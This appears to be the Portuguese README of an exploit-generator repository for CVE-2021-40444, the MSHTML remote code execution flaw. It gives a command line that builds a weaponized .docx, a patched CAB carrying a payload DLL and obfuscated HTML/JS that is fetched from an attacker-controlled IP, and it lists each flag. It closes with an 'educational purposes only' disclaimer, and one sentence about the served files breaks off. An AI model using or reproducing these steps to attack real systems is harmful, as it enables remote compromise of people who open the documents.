
Gerador de exploits baseado em Python para CVE-2021-40444 (MSHTML RCE) com entrega de payload orientada a modelos por meio de documentos Office maliciosos, arquivos CAB e callbacks HTML/JS ofuscados.
Certifique-se de executar setup.sh primeiro, pois você precisará de alguns diretórios. Depois de executar o script, você poderá executar gen.py com o exemplo fornecido:-
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3
# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity
http.server estará no diretório . Este diretório terá 3 arquivos:-web

Este repositório é apenas para fins educacionais e não deve ser usado na prática com más intenções. Qualquer uso ilegal deste repositório é estritamente de sua própria responsabilidade e risco.